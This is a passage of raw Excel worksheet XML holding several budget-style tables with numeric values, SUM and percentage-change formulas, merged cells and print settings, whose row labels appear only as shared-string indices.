      <c r="G10" s="104"/>
      <c r="H10" s="85"/>
    </row>
    <row r="11" s="81" customFormat="1" ht="27.75" customHeight="1" spans="1:10">
      <c r="A11" s="102" t="s">
        <v>2452</v>
      </c>
      <c r="B11" s="103"/>
      <c r="C11" s="103"/>
      <c r="D11" s="104"/>
      <c r="E11" s="103"/>
      <c r="F11" s="103"/>
      <c r="G11" s="104"/>
      <c r="J11" s="117"/>
    </row>
    <row r="12" s="81" customFormat="1" ht="27.75" customHeight="1" spans="1:7">
      <c r="A12" s="102" t="s">
        <v>2453</v>
      </c>
      <c r="B12" s="103"/>
      <c r="C12" s="103"/>
      <c r="D12" s="104"/>
      <c r="E12" s="103"/>
      <c r="F12" s="103"/>
      <c r="G12" s="104"/>
    </row>
    <row r="13" s="81" customFormat="1" ht="27.75" customHeight="1" spans="1:7">
      <c r="A13" s="102" t="s">
        <v>2454</v>
      </c>
      <c r="B13" s="103"/>
      <c r="C13" s="103"/>
      <c r="D13" s="104"/>
      <c r="E13" s="103"/>
      <c r="F13" s="103"/>
      <c r="G13" s="104"/>
    </row>
    <row r="14" s="81" customFormat="1" ht="27.75" customHeight="1" spans="1:7">
      <c r="A14" s="102" t="s">
        <v>2455</v>
      </c>
      <c r="B14" s="103">
        <v>828</v>
      </c>
      <c r="C14" s="103">
        <v>886</v>
      </c>
      <c r="D14" s="104">
        <f>(C14-B14)/B14*100</f>
        <v>7.0048309178744</v>
      </c>
      <c r="E14" s="103">
        <v>605</v>
      </c>
      <c r="F14" s="103">
        <v>733</v>
      </c>
      <c r="G14" s="104">
        <f t="shared" ref="G13:G30" si="0">(F14-E14)/E14*100</f>
        <v>21.1570247933884</v>
      </c>
    </row>
    <row r="15" s="81" customFormat="1" ht="27.75" customHeight="1" spans="1:7">
      <c r="A15" s="102" t="s">
        <v>2456</v>
      </c>
      <c r="B15" s="103">
        <v>101</v>
      </c>
      <c r="C15" s="103">
        <v>108</v>
      </c>
      <c r="D15" s="104">
        <f>(C15-B15)/B15*100</f>
        <v>6.93069306930693</v>
      </c>
      <c r="E15" s="103">
        <v>87</v>
      </c>
      <c r="F15" s="103">
        <v>105</v>
      </c>
      <c r="G15" s="104">
        <f t="shared" si="0"/>
        <v>20.6896551724138</v>
      </c>
    </row>
    <row r="16" s="81" customFormat="1" ht="27.75" customHeight="1" spans="1:7">
      <c r="A16" s="102" t="s">
        <v>2457</v>
      </c>
      <c r="B16" s="103"/>
      <c r="C16" s="103"/>
      <c r="D16" s="104"/>
      <c r="E16" s="103"/>
      <c r="F16" s="103"/>
      <c r="G16" s="104"/>
    </row>
    <row r="17" s="81" customFormat="1" ht="27.75" customHeight="1" spans="1:7">
      <c r="A17" s="102" t="s">
        <v>2458</v>
      </c>
      <c r="B17" s="103">
        <v>388</v>
      </c>
      <c r="C17" s="103">
        <v>994</v>
      </c>
      <c r="D17" s="104">
        <f>(C17-B17)/B17*100</f>
        <v>156.185567010309</v>
      </c>
      <c r="E17" s="103">
        <v>473</v>
      </c>
      <c r="F17" s="103">
        <v>573</v>
      </c>
      <c r="G17" s="104">
        <f t="shared" si="0"/>
        <v>21.1416490486258</v>
      </c>
    </row>
    <row r="18" s="81" customFormat="1" ht="27.75" customHeight="1" spans="1:7">
      <c r="A18" s="102" t="s">
        <v>2459</v>
      </c>
      <c r="B18" s="103">
        <v>572</v>
      </c>
      <c r="C18" s="103">
        <v>375</v>
      </c>
      <c r="D18" s="104">
        <f>(C18-B18)/B18*100</f>
        <v>-34.4405594405594</v>
      </c>
      <c r="E18" s="103">
        <v>529</v>
      </c>
      <c r="F18" s="103">
        <v>641</v>
      </c>
      <c r="G18" s="104">
        <f t="shared" si="0"/>
        <v>21.17202268431</v>
      </c>
    </row>
    <row r="19" s="81" customFormat="1" ht="27.75" customHeight="1" spans="1:8">
      <c r="A19" s="102" t="s">
        <v>2460</v>
      </c>
      <c r="B19" s="103"/>
      <c r="C19" s="103"/>
      <c r="D19" s="104"/>
      <c r="E19" s="103"/>
      <c r="F19" s="103"/>
      <c r="G19" s="104"/>
      <c r="H19" s="83"/>
    </row>
    <row r="20" s="81" customFormat="1" ht="27.75" customHeight="1" spans="1:8">
      <c r="A20" s="102" t="s">
        <v>2461</v>
      </c>
      <c r="B20" s="103"/>
      <c r="C20" s="103"/>
      <c r="D20" s="104"/>
      <c r="E20" s="103"/>
      <c r="F20" s="103"/>
      <c r="G20" s="104"/>
      <c r="H20" s="83"/>
    </row>
    <row r="21" s="81" customFormat="1" ht="27.75" customHeight="1" spans="1:7">
      <c r="A21" s="102" t="s">
        <v>2462</v>
      </c>
      <c r="B21" s="103"/>
      <c r="C21" s="103"/>
      <c r="D21" s="104"/>
      <c r="E21" s="103"/>
      <c r="F21" s="103"/>
      <c r="G21" s="104"/>
    </row>
    <row r="22" s="83" customFormat="1" ht="27.75" customHeight="1" spans="1:8">
      <c r="A22" s="102" t="s">
        <v>2463</v>
      </c>
      <c r="B22" s="103">
        <v>556</v>
      </c>
      <c r="C22" s="103">
        <v>252</v>
      </c>
      <c r="D22" s="104">
        <f>(C22-B22)/B22*100</f>
        <v>-54.6762589928058</v>
      </c>
      <c r="E22" s="103">
        <v>208</v>
      </c>
      <c r="F22" s="103">
        <v>252</v>
      </c>
      <c r="G22" s="104">
        <f>(F22-E22)/E22*100</f>
        <v>21.1538461538462</v>
      </c>
      <c r="H22" s="85"/>
    </row>
    <row r="23" s="81" customFormat="1" ht="27.75" customHeight="1" spans="1:8">
      <c r="A23" s="102" t="s">
        <v>2464</v>
      </c>
      <c r="B23" s="103"/>
      <c r="C23" s="103"/>
      <c r="D23" s="104"/>
      <c r="E23" s="103"/>
      <c r="F23" s="103"/>
      <c r="G23" s="104"/>
      <c r="H23" s="85"/>
    </row>
    <row r="24" s="81" customFormat="1" ht="27.75" customHeight="1" spans="1:7">
      <c r="A24" s="102" t="s">
        <v>2465</v>
      </c>
      <c r="B24" s="103"/>
      <c r="C24" s="103"/>
      <c r="D24" s="104"/>
      <c r="E24" s="103"/>
      <c r="F24" s="103"/>
      <c r="G24" s="104"/>
    </row>
    <row r="25" s="81" customFormat="1" ht="27.75" customHeight="1" spans="1:7">
      <c r="A25" s="102" t="s">
        <v>2466</v>
      </c>
      <c r="B25" s="103"/>
      <c r="C25" s="103"/>
      <c r="D25" s="104"/>
      <c r="E25" s="103"/>
      <c r="F25" s="103"/>
      <c r="G25" s="104"/>
    </row>
    <row r="26" s="83" customFormat="1" ht="27.75" customHeight="1" spans="1:7">
      <c r="A26" s="105" t="s">
        <v>927</v>
      </c>
      <c r="B26" s="106">
        <f>SUM(B7:B25)</f>
        <v>6560</v>
      </c>
      <c r="C26" s="106">
        <f>SUM(C7:C25)</f>
        <v>7011</v>
      </c>
      <c r="D26" s="107">
        <f t="shared" ref="D26:D33" si="1">(C26-B26)/B26*100</f>
        <v>6.875</v>
      </c>
      <c r="E26" s="106">
        <f>SUM(E7:E25)</f>
        <v>3445</v>
      </c>
      <c r="F26" s="106">
        <f>SUM(F7:F25)</f>
        <v>4174</v>
      </c>
      <c r="G26" s="107">
        <f t="shared" si="0"/>
        <v>21.1611030478955</v>
      </c>
    </row>
    <row r="27" s="81" customFormat="1" ht="27.75" customHeight="1" spans="1:8">
      <c r="A27" s="108" t="s">
        <v>2467</v>
      </c>
      <c r="B27" s="109">
        <f t="shared" ref="B27:F27" si="2">B28+B31+B32</f>
        <v>42076</v>
      </c>
      <c r="C27" s="109">
        <f t="shared" si="2"/>
        <v>44485</v>
      </c>
      <c r="D27" s="104">
        <f t="shared" si="1"/>
        <v>5.72535412111417</v>
      </c>
      <c r="E27" s="109">
        <f t="shared" si="2"/>
        <v>18588</v>
      </c>
      <c r="F27" s="109">
        <f t="shared" si="2"/>
        <v>22518</v>
      </c>
      <c r="G27" s="104">
        <f t="shared" si="0"/>
        <v>21.1426726920594</v>
      </c>
      <c r="H27" s="85"/>
    </row>
    <row r="28" s="81" customFormat="1" ht="27.75" customHeight="1" spans="1:8">
      <c r="A28" s="108" t="s">
        <v>2468</v>
      </c>
      <c r="B28" s="110">
        <f t="shared" ref="B28:F28" si="3">SUM(B29:B30)</f>
        <v>42076</v>
      </c>
      <c r="C28" s="110">
        <f t="shared" si="3"/>
        <v>44485</v>
      </c>
      <c r="D28" s="104">
        <f t="shared" si="1"/>
        <v>5.72535412111417</v>
      </c>
      <c r="E28" s="110">
        <v>18588</v>
      </c>
      <c r="F28" s="110">
        <v>22518</v>
      </c>
      <c r="G28" s="104">
        <f t="shared" si="0"/>
        <v>21.1426726920594</v>
      </c>
      <c r="H28" s="85"/>
    </row>
    <row r="29" s="84" customFormat="1" ht="27.75" customHeight="1" spans="1:7">
      <c r="A29" s="108" t="s">
        <v>2469</v>
      </c>
      <c r="B29" s="110">
        <v>41473</v>
      </c>
      <c r="C29" s="110">
        <v>43802</v>
      </c>
      <c r="D29" s="104">
        <f t="shared" si="1"/>
        <v>5.61570178188219</v>
      </c>
      <c r="E29" s="110">
        <v>18096</v>
      </c>
      <c r="F29" s="110">
        <v>21922</v>
      </c>
      <c r="G29" s="104">
        <f t="shared" si="0"/>
        <v>21.1427939876216</v>
      </c>
    </row>
    <row r="30" ht="27.75" customHeight="1" spans="1:7">
      <c r="A30" s="108" t="s">
        <v>2470</v>
      </c>
      <c r="B30" s="110">
        <v>603</v>
      </c>
      <c r="C30" s="110">
        <v>683</v>
      </c>
      <c r="D30" s="104">
        <f t="shared" si="1"/>
        <v>13.2669983416252</v>
      </c>
      <c r="E30" s="110">
        <v>492</v>
      </c>
      <c r="F30" s="110">
        <v>596</v>
      </c>
      <c r="G30" s="104">
        <f t="shared" si="0"/>
        <v>21.1382113821138</v>
      </c>
    </row>
    <row r="31" ht="27.75" customHeight="1" spans="1:7">
      <c r="A31" s="111" t="s">
        <v>2471</v>
      </c>
      <c r="B31" s="112"/>
      <c r="C31" s="112"/>
      <c r="D31" s="104"/>
      <c r="E31" s="112"/>
      <c r="F31" s="112"/>
      <c r="G31" s="104"/>
    </row>
    <row r="32" ht="27.75" customHeight="1" spans="1:7">
      <c r="A32" s="111" t="s">
        <v>2472</v>
      </c>
      <c r="B32" s="112"/>
      <c r="C32" s="112"/>
      <c r="D32" s="104"/>
      <c r="E32" s="112"/>
      <c r="F32" s="112"/>
      <c r="G32" s="104"/>
    </row>
    <row r="33" s="84" customFormat="1" ht="27.75" customHeight="1" spans="1:7">
      <c r="A33" s="113" t="s">
        <v>783</v>
      </c>
      <c r="B33" s="114">
        <f>SUM(B26+B27)</f>
        <v>48636</v>
      </c>
      <c r="C33" s="114">
        <f>SUM(C26+C27)</f>
        <v>51496</v>
      </c>
      <c r="D33" s="115">
        <f t="shared" si="1"/>
        <v>5.88041779751624</v>
      </c>
      <c r="E33" s="114">
        <f>E26+E27</f>
        <v>22033</v>
      </c>
      <c r="F33" s="114">
        <f>F26+F27</f>
        <v>26692</v>
      </c>
      <c r="G33" s="115">
        <f>(F33-E33)/E33*100</f>
        <v>21.1455543956792</v>
      </c>
    </row>
    <row r="36" spans="4:6">
      <c r="D36" s="116"/>
      <c r="F36" s="116"/>
    </row>
  </sheetData>
  <mergeCells count="9">
    <mergeCell ref="A2:G2"/>
    <mergeCell ref="F3:G3"/>
    <mergeCell ref="B4:D4"/>
    <mergeCell ref="E4:G4"/>
    <mergeCell ref="C5:D5"/>
    <mergeCell ref="F5:G5"/>
    <mergeCell ref="A4:A6"/>
    <mergeCell ref="B5:B6"/>
    <mergeCell ref="E5:E6"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="0.98" bottom="0.98" header="0.51" footer="0.51"/>
  <pageSetup paperSize="9" scale="84"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599993896298105"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:D35"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A2" sqref="A2:B2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6" outlineLevelCol="3"/>
  <cols>
    <col min="1" max="1" width="63.5740740740741" style="1143" customWidth="1"/>
    <col min="2" max="2" width="31" style="1143" customWidth="1"/>
    <col min="3" max="3" width="10.2777777777778" style="1144"/>
    <col min="4" max="16384" width="10.2777777777778" style="1143"/>
  </cols>
  <sheetData>
    <row r="1" s="79" customFormat="1" ht="18" customHeight="1" spans="1:3">
      <c r="A1" s="1142" t="s">
        <v>455</v>
      </c>
      <c r="C1" s="81"/>
    </row>
    <row r="2" ht="51" customHeight="1" spans="1:2">
      <c r="A2" s="1145" t="s">
        <v>456</v>
      </c>
      <c r="B2" s="1146"/>
    </row>
    <row r="3" ht="18" customHeight="1" spans="1:2">
      <c r="A3" s="1147" t="s">
        <v>373</v>
      </c>
      <c r="B3" s="1147"/>
    </row>
    <row r="4" ht="24.95" customHeight="1" spans="1:2">
      <c r="A4" s="972" t="s">
        <v>457</v>
      </c>
      <c r="B4" s="972" t="s">
        <v>458</v>
      </c>
    </row>
    <row r="5" ht="24.95" customHeight="1" spans="1:3">
      <c r="A5" s="1148" t="s">
        <v>459</v>
      </c>
      <c r="B5" s="1149">
        <f>SUM(B6:B27)</f>
        <v>147995</v>
      </c>
      <c r="C5" s="1150"/>
    </row>
    <row r="6" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A6" s="1151" t="s">
        <v>460</v>
      </c>
      <c r="B6" s="1152">
        <v>18290</v>
      </c>
      <c r="C6" s="1150"/>
    </row>
    <row r="7" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A7" s="1153" t="s">
        <v>461</v>
      </c>
      <c r="B7" s="1152">
        <v>19087</v>
      </c>
      <c r="C7" s="1150"/>
    </row>
    <row r="8" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A8" s="1153" t="s">
        <v>462</v>
      </c>
      <c r="B8" s="1152">
        <v>1983</v>
      </c>
      <c r="C8" s="1150"/>
    </row>
    <row r="9" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A9" s="1153" t="s">
        <v>463</v>
      </c>
      <c r="B9" s="1152">
        <v>264</v>
      </c>
      <c r="C9" s="1150"/>
    </row>
    <row r="10" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A10" s="1153" t="s">
        <v>464</v>
      </c>
      <c r="B10" s="1152">
        <v>102</v>
      </c>
      <c r="C10" s="1150"/>
    </row>
    <row r="11" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A11" s="1153" t="s">
        <v>465</v>
      </c>
      <c r="B11" s="1152">
        <v>4919</v>
      </c>
      <c r="C11" s="1150"/>
    </row>
    <row r="12" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A12" s="1153" t="s">
        <v>466</v>
      </c>
      <c r="B12" s="1152">
        <v>8884</v>
      </c>
      <c r="C12" s="1150"/>
    </row>
    <row r="13" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A13" s="1153" t="s">
        <v>467</v>
      </c>
      <c r="B13" s="1152">
        <v>3961</v>
      </c>
      <c r="C13" s="1150"/>
    </row>
    <row r="14" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A14" s="1153" t="s">
        <v>468</v>
      </c>
      <c r="B14" s="1152">
        <v>3747</v>
      </c>
      <c r="C14" s="1150"/>
    </row>
    <row r="15" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A15" s="1153" t="s">
        <v>469</v>
      </c>
      <c r="B15" s="1152">
        <v>1266</v>
      </c>
      <c r="C15" s="1150"/>
    </row>
    <row r="16" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A16" s="1153" t="s">
        <v>470</v>
      </c>
      <c r="B16" s="1152">
        <v>7329</v>
      </c>
      <c r="C16" s="1150"/>
    </row>
    <row r="17" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A17" s="1153" t="s">
        <v>471</v>
      </c>
      <c r="B17" s="1152">
        <v>5</v>
      </c>
      <c r="C17" s="1150"/>
    </row>
    <row r="18" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A18" s="1153" t="s">
        <v>472</v>
      </c>
      <c r="B18" s="1152">
        <v>572</v>
      </c>
      <c r="C18" s="1150"/>
    </row>
    <row r="19" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A19" s="1153" t="s">
        <v>473</v>
      </c>
      <c r="B19" s="1152">
        <v>40020</v>
      </c>
      <c r="C19" s="1150"/>
    </row>
    <row r="20" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A20" s="1153" t="s">
        <v>474</v>
      </c>
      <c r="B20" s="1152">
        <v>14198</v>
      </c>
      <c r="C20" s="1150"/>
    </row>
    <row r="21" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A21" s="1153" t="s">
        <v>475</v>
      </c>
      <c r="B21" s="1152">
        <v>1102</v>
      </c>
      <c r="C21" s="1150"/>
    </row>
    <row r="22" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A22" s="1153" t="s">
        <v>476</v>
      </c>
      <c r="B22" s="1152">
        <v>16344</v>
      </c>
      <c r="C22" s="1150"/>
    </row>
    <row r="23" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A23" s="1153" t="s">
        <v>477</v>
      </c>
      <c r="B23" s="1152">
        <v>1691</v>
      </c>
      <c r="C23" s="1150"/>
    </row>
    <row r="24" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A24" s="1153" t="s">
        <v>478</v>
      </c>
      <c r="B24" s="1152">
        <v>337</v>
      </c>
      <c r="C24" s="1150"/>
    </row>
    <row r="25" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A25" s="1153" t="s">
        <v>479</v>
      </c>
      <c r="B25" s="1152">
        <v>174</v>
      </c>
      <c r="C25" s="1150"/>
    </row>
    <row r="26" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A26" s="1153" t="s">
        <v>480</v>
      </c>
      <c r="B26" s="1152">
        <v>608</v>
      </c>
      <c r="C26" s="1150"/>
    </row>
    <row r="27" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A27" s="1153" t="s">
        <v>481</v>
      </c>
      <c r="B27" s="1152">
        <v>3112</v>
      </c>
      <c r="C27" s="1150"/>
    </row>
    <row r="28" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A28" s="1154" t="s">
        <v>482</v>
      </c>
      <c r="B28" s="1155">
        <v>12077</v>
      </c>
      <c r="C28" s="1150"/>
    </row>
    <row r="29" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A29" s="1153" t="s">
        <v>483</v>
      </c>
      <c r="B29" s="1152">
        <v>4137</v>
      </c>
      <c r="C29" s="1150"/>
    </row>
    <row r="30" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A30" s="1153" t="s">
        <v>484</v>
      </c>
      <c r="B30" s="1152">
        <v>440</v>
      </c>
      <c r="C30" s="1150"/>
    </row>
    <row r="31" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A31" s="1153" t="s">
        <v>485</v>
      </c>
      <c r="B31" s="1152">
        <v>3644</v>
      </c>
      <c r="C31" s="1144"/>
    </row>
    <row r="32" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A32" s="1153" t="s">
        <v>486</v>
      </c>
      <c r="B32" s="1152">
        <v>3666</v>
      </c>
      <c r="C32" s="1144"/>
    </row>
    <row r="33" s="63" customFormat="1" ht="24.95" customHeight="1" spans="1:4">
      <c r="A33" s="1153" t="s">
        <v>487</v>
      </c>
      <c r="B33" s="1152">
        <v>-142</v>
      </c>
      <c r="C33" s="1144"/>
      <c r="D33" s="1143"/>
    </row>
    <row r="34" ht="24.95" customHeight="1" spans="1:2">
      <c r="A34" s="1153" t="s">
        <v>488</v>
      </c>
      <c r="B34" s="1152">
        <v>332</v>
      </c>
    </row>
    <row r="35" ht="24.95" customHeight="1" spans="1:2">
      <c r="A35" s="1136" t="s">
        <v>489</v>
      </c>
      <c r="B35" s="1156">
        <f>B5+B28</f>
        <v>160072</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A2:B2"/>
    <mergeCell ref="A3:B3"/>
  </mergeCells>
  <pageMargins left="0.984027777777778" right="0.75" top="0.432638888888889" bottom="0.275" header="0.236111111111111" footer="0.236111111111111"/>
  <pageSetup paperSize="9" scale="93" orientation="portrait"/>
  <headerFooter/>
</worksheet>
</file>

<file path=xl/worksheets/sheet8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7"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="C4" sqref="C4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.14814814814815" defaultRowHeight="13.2" outlineLevelRow="6"/>
  <cols>
    <col min="1" max="1" width="89.7222222222222" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" ht="57" customHeight="1"/>
    <row r="2" ht="57" customHeight="1"/>
    <row r="3" ht="148.8" spans="1:1">
      <c r="A3" s="78" t="s">
        <v>2473</v>
      </c>
    </row>
    <row r="4" ht="57" customHeight="1"/>
    <row r="5" ht="57" customHeight="1"/>
    <row r="6" ht="57" customHeight="1"/>
    <row r="7" ht="57" customHeight="1"/>
  </sheetData>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="portrait"/>
  <headerFooter/>
</worksheet>
</file>

<file path=xl/worksheets/sheet8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7"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="3" topLeftCell="B4" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="F13" sqref="F13"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.72222222222222" defaultRowHeight="14.4" outlineLevelCol="5"/>
  <cols>
    <col min="1" max="1" width="12.8425925925926" style="66" customWidth="1"/>
    <col min="2" max="2" width="12.5740740740741" style="66" customWidth="1"/>
    <col min="3" max="3" width="20.1481481481481" style="66" customWidth="1"/>
    <col min="4" max="4" width="21.5740740740741" style="66" customWidth="1"/>
    <col min="5" max="5" width="13.5740740740741" style="66" customWidth="1"/>
    <col min="6" max="16384" width="9.72222222222222" style="66"/>
  </cols>
  <sheetData>
    <row r="1" ht="24" customHeight="1" spans="1:1">
      <c r="A1" s="67" t="s">
        <v>2106</v>
      </c>
    </row>
    <row r="2" s="63" customFormat="1" ht="39.95" customHeight="1" spans="1:5">
      <c r="A2" s="68" t="s">
        <v>2474</v>
      </c>
      <c r="B2" s="68"/>
      <c r="C2" s="68"/>
      <c r="D2" s="68"/>
      <c r="E2" s="68"/>
    </row>
    <row r="3" s="63" customFormat="1" ht="27.95" customHeight="1" spans="1:5">
      <c r="A3" s="69" t="s">
        <v>2475</v>
      </c>
      <c r="B3" s="70"/>
      <c r="C3" s="70"/>
      <c r="D3" s="70"/>
      <c r="E3" s="70"/>
    </row>
    <row r="4" s="63" customFormat="1" ht="27.95" customHeight="1" spans="1:5">
      <c r="A4" s="69" t="s">
        <v>2476</v>
      </c>
      <c r="B4" s="71"/>
      <c r="C4" s="71"/>
      <c r="D4" s="71"/>
      <c r="E4" s="71"/>
    </row>
    <row r="5" s="63" customFormat="1" ht="27.95" customHeight="1" spans="1:5">
      <c r="A5" s="69" t="s">
        <v>2477</v>
      </c>
      <c r="B5" s="70" t="s">
        <v>2478</v>
      </c>
      <c r="C5" s="71"/>
      <c r="D5" s="71"/>
      <c r="E5" s="70"/>
    </row>
    <row r="6" s="63" customFormat="1" ht="96.95" customHeight="1" spans="1:5">
      <c r="A6" s="70" t="s">
        <v>2479</v>
      </c>
      <c r="B6" s="70"/>
      <c r="C6" s="70"/>
      <c r="D6" s="70"/>
      <c r="E6" s="70"/>
    </row>
    <row r="7" s="64" customFormat="1" ht="33.95" customHeight="1" spans="1:5">
      <c r="A7" s="72" t="s">
        <v>2480</v>
      </c>
      <c r="B7" s="72" t="s">
        <v>2481</v>
      </c>
      <c r="C7" s="72" t="s">
        <v>2482</v>
      </c>
      <c r="D7" s="72" t="s">
        <v>2483</v>
      </c>
      <c r="E7" s="72" t="s">
        <v>2484</v>
      </c>
    </row>
    <row r="8" s="65" customFormat="1" ht="35.1" customHeight="1" spans="1:5">
      <c r="A8" s="69" t="s">
        <v>2485</v>
      </c>
      <c r="B8" s="69" t="s">
        <v>2486</v>
      </c>
      <c r="C8" s="69" t="s">
        <v>2487</v>
      </c>
      <c r="D8" s="73"/>
      <c r="E8" s="69"/>
    </row>
    <row r="9" s="65" customFormat="1" ht="35.1" customHeight="1" spans="1:5">
      <c r="A9" s="69"/>
      <c r="B9" s="69"/>
      <c r="C9" s="69" t="s">
        <v>2488</v>
      </c>
      <c r="D9" s="73"/>
      <c r="E9" s="74"/>
    </row>
    <row r="10" s="65" customFormat="1" ht="35.1" customHeight="1" spans="1:6">
      <c r="A10" s="69"/>
      <c r="B10" s="69"/>
      <c r="C10" s="69" t="s">
        <v>2489</v>
      </c>
      <c r="D10" s="73"/>
      <c r="E10" s="74"/>
      <c r="F10" s="75"/>
    </row>
    <row r="11" s="65" customFormat="1" ht="35.1" customHeight="1" spans="1:6">
      <c r="A11" s="69"/>
      <c r="B11" s="69"/>
      <c r="C11" s="69" t="s">
        <v>2490</v>
      </c>
      <c r="D11" s="73"/>
      <c r="E11" s="74"/>
      <c r="F11" s="75"/>
    </row>
    <row r="12" s="63" customFormat="1" ht="35.1" customHeight="1" spans="1:6">
      <c r="A12" s="69"/>
      <c r="B12" s="69" t="s">
        <v>2491</v>
      </c>
      <c r="C12" s="76" t="s">
        <v>2492</v>
      </c>
      <c r="D12" s="71"/>
      <c r="E12" s="69"/>
      <c r="F12" s="75"/>
    </row>
    <row r="13" ht="35.1" customHeight="1" spans="1:5">
      <c r="A13" s="69"/>
      <c r="B13" s="69"/>
      <c r="C13" s="76" t="s">
        <v>2493</v>
      </c>
      <c r="D13" s="77"/>
      <c r="E13" s="77"/>
    </row>
    <row r="14" ht="35.1" customHeight="1" spans="1:5">
      <c r="A14" s="69"/>
      <c r="B14" s="69"/>
      <c r="C14" s="76" t="s">
        <v>2494</v>
      </c>
      <c r="D14" s="77"/>
      <c r="E14" s="77"/>
    </row>
    <row r="15" ht="35.1" customHeight="1" spans="1:5">
      <c r="A15" s="69"/>
      <c r="B15" s="69"/>
      <c r="C15" s="76" t="s">
        <v>2495</v>
      </c>
      <c r="D15" s="77"/>
      <c r="E15" s="77"/>
    </row>
    <row r="16" ht="35.1" customHeight="1" spans="1:5">
      <c r="A16" s="69"/>
      <c r="B16" s="69"/>
      <c r="C16" s="76" t="s">
        <v>2496</v>
      </c>
      <c r="D16" s="77"/>
      <c r="E16" s="77"/>
    </row>
    <row r="17" ht="35.1" customHeight="1" spans="1:5">
      <c r="A17" s="69"/>
      <c r="B17" s="69" t="s">
        <v>2497</v>
      </c>
      <c r="C17" s="69" t="s">
        <v>2498</v>
      </c>
      <c r="D17" s="71"/>
      <c r="E17" s="69"/>
    </row>
  </sheetData>
  <mergeCells count="8">
    <mergeCell ref="A2:E2"/>
    <mergeCell ref="B3:E3"/>
    <mergeCell ref="B4:E4"/>
    <mergeCell ref="C5:E5"/>
    <mergeCell ref="B6:E6"/>
    <mergeCell ref="A8:A17"/>
    <mergeCell ref="B8:B11"/>
    <mergeCell ref="B12:B16"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.751388888888889" right="0.751388888888889" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="portrait"/>
  <headerFooter/>
</worksheet>
</file>

<file path=xl/worksheets/sheet8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sheetPr>
  <dimension ref="A1:AP1656"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="5" ySplit="6" topLeftCell="F1306" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="H1334" sqref="H1334"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.4259259259259" defaultRowHeight="13.2"/>
  <cols>
    <col min="1" max="1" width="10.4259259259259" customWidth="1"/>
    <col min="2" max="3" width="9.57407407407407" customWidth="1"/>
    <col min="4" max="4" width="11.4259259259259" customWidth="1"/>
    <col min="5" max="5" width="33.7222222222222" customWidth="1"/>
    <col min="6" max="13" width="20.1481481481481" customWidth="1"/>
    <col min="14" max="14" width="12.4259259259259" customWidth="1"/>
    <col min="15" max="25" width="20.1481481481481" customWidth="1"/>
    <col min="26" max="26" width="12.4259259259259" customWidth="1"/>
    <col min="27" max="37" width="20.1481481481481" customWidth="1"/>
    <col min="38" max="38" width="12.4259259259259" customWidth="1"/>
    <col min="39" max="42" width="20.1481481481481" customWidth="1"/>
    <col min="257" max="257" width="10.4259259259259" customWidth="1"/>
    <col min="258" max="259" width="9.57407407407407" customWidth="1"/>
    <col min="260" max="260" width="11.4259259259259" customWidth="1"/>
    <col min="261" max="261" width="33.7222222222222" customWidth="1"/>
    <col min="262" max="269" width="20.1481481481481" customWidth="1"/>
    <col min="270" max="270" width="12.4259259259259" customWidth="1"/>
    <col min="271" max="281" width="20.1481481481481" customWidth="1"/>
    <col min="282" max="282" width="12.4259259259259" customWidth="1"/>
